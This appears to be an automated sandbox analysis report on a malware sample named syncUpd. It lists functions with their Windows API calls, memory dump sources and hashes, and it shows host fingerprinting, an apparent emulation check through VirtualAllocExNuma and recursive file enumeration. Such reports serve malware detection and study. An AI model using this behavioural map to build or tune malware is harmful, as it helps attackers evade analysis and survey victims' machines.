                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
                                                                                                                                                                                                                                                              • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00415BAF
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3183270410-0
                                                                                                                                                                                                                                                              • Opcode ID: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
                                                                                                                                                                                                                                                              • Instruction ID: b12b055c0fde6327b7bfc42128d307bcca402a5100f46dd347d8d84938e244fe
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5F05475A0010CFBDB14DFA4DC4AFED7778BB08300F004499BA0597280D6B06E85CB94
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00414400 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                                              • GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4203777966-0
                                                                                                                                                                                                                                                              • Opcode ID: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
                                                                                                                                                                                                                                                              • Instruction ID: 2ac30a00ccf60c4f43266989ac8565747831d88261cb92d9c694311de33eed43
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1E0D8B0A00608FBCB20DFE4DD48BDD77BCAB04305F100055FA05D3240D7749A458B96
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004010D0 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
                                                                                                                                                                                                                                                              • VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00401103
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Process$AllocCurrentExitNumaVirtual
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1103761159-0
                                                                                                                                                                                                                                                              • Opcode ID: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
                                                                                                                                                                                                                                                              • Instruction ID: b86936f0f7b92ad6105a5e8d9325c57b614f4cde8fc05540e07f2d0ff83aec39
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1BE0867098570CBBE7309BA0DD0AB1976689B08B06F101055F7097A1D0C6B425008699
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00943526 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0094354E
                                                                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 0094356E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758267027.0000000000942000.00000040.00000020.00020000.00000000.sdmp, Offset: 00942000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_942000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3833638111-0
                                                                                                                                                                                                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                              • Instruction ID: a2f614f4c54c1cc04ac6633843edd01d15b106d88ef456d402721f2c9b5edc32
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BEF06D326007116BE7203AB9A88DF6A76ECAF99725F108528F64A910C0DB70EE458A61
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004147C0 Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2452939696-0
                                                                                                                                                                                                                                                              • Opcode ID: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
                                                                                                                                                                                                                                                              • Instruction ID: d87a4f6b3ea3f44bdf221dc5e2fa01f01132d118a4d77551e5f155a4815ada85
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FAD012B580020C5BD720DBD0ED49AE9B77DBB44204F4049A5EE1492140EBB96AD58AA5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008F0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000400,?,?,008F0223,?,?), ref: 008F0E19
                                                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,?,?,008F0223,?,?), ref: 008F0E1E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorMode
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2340568224-0
                                                                                                                                                                                                                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                              • Instruction ID: 871f1ad702813c1d58b0d788e193df3154170197c2f1ac7536c0ed9c79c35ec1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83D0123154512CB7D7002A94DC09BDD7B1CDF05B62F008411FB0DD9081C770994046E5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00401060 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040110E,?,?,004136DC), ref: 00401073
                                                                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040110E,?,?,004136DC), ref: 004010B7
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2087232378-0
                                                                                                                                                                                                                                                              • Opcode ID: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
                                                                                                                                                                                                                                                              • Instruction ID: a2913bed729a6fe358320823385779fc3d8f71f1cc7b0a13f7ab4b92dd49de4a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42F027B1641208BBE724DAF4AC59FAFF79CA745B05F304559F980E3390DA719F00CAA4
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00401150 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                                                • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                                                • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,0095DA10,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                                                • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00401186
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$Process$AllocName$ComputerExitUser
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1004333139-0
                                                                                                                                                                                                                                                              • Opcode ID: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
                                                                                                                                                                                                                                                              • Instruction ID: 69e00d56220517d966a61d162f3bbf9e0969f4784ba4f73569e39f9695f87914
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78E012B5E1070462CA1573B27E06BD7729D5F9930EF40142AFE0497253FD2DE45145BD
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 009431E5 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00943236
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758267027.0000000000942000.00000040.00000020.00020000.00000000.sdmp, Offset: 00942000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_942000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                              • Instruction ID: 034ece25cc579ac5bfe0a78bdf60ade3c0f6aa72c5648819b7de141c7c385539
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73112B79A00208EFDB01DF98C985E98BBF5AF08350F15C094F9589B362D371EA50DB90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00414FF0 Relevance: 1.3, APIs: 1, Instructions: 12COMMONLIBRARYCODE
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2803490479-0
                                                                                                                                                                                                                                                              • Opcode ID: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
                                                                                                                                                                                                                                                              • Instruction ID: 71a24ea012b18c325b39d17d5ea825459b0100de2daa219f1012b17ed67d7128
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CC012B090410CEB8B00CF98EC0588A7BECDB08200B0041A4FC0DC3300D631AE1087D5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                                              Function 00411650 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 237filestringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00411669
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00411680
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004116D2
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D7F8), ref: 004116E4
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D7FC), ref: 004116FA
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00411980
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00411995
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                                                                                                                                                                                                                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                                                                                                                                                                                                                                              • API String ID: 1125553467-2524465048
                                                                                                                                                                                                                                                              • Opcode ID: 54eea407fa88e930b047064599d17e1a4f4e8ecb990bbb8718eb28acc22d8055
                                                                                                                                                                                                                                                              • Instruction ID: 56f1237c2d7c520c90c98f1ce5fb3a6d9b51b415e2d0c2f733ce4a2014328567
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54eea407fa88e930b047064599d17e1a4f4e8ecb990bbb8718eb28acc22d8055
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE9172B19006189BDB24EFA4DC85FEA737DBF88300F044589F61A92191DB789AC5CFA5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00412570 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00412589
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 004125A0
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 004127CE
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                                                                                                                              • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                                                              • API String ID: 180737720-445461498
                                                                                                                                                                                                                                                              • Opcode ID: 100e8ff3c6596f946fad9c3c62f16106e1055ef7d4c3412932ac9e282f866cfd
                                                                                                                                                                                                                                                              • Instruction ID: 16fd5a9597efbfb91ed0225017393bb16e0f77851f83799e5682f8bc7922baf0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 100e8ff3c6596f946fad9c3c62f16106e1055ef7d4c3412932ac9e282f866cfd
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 676156B2900618ABCB24EBE0DD99EEA737DBF58701F00458DB61A96140EF74DB85CF94
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 009018B7 Relevance: 30.2, APIs: 20, Instructions: 237filestringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 009018D0
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 009018E7
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00901939
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D7F8), ref: 0090194B
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D7FC), ref: 00901961
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00901BE7
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00901BFC
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1125553467-0
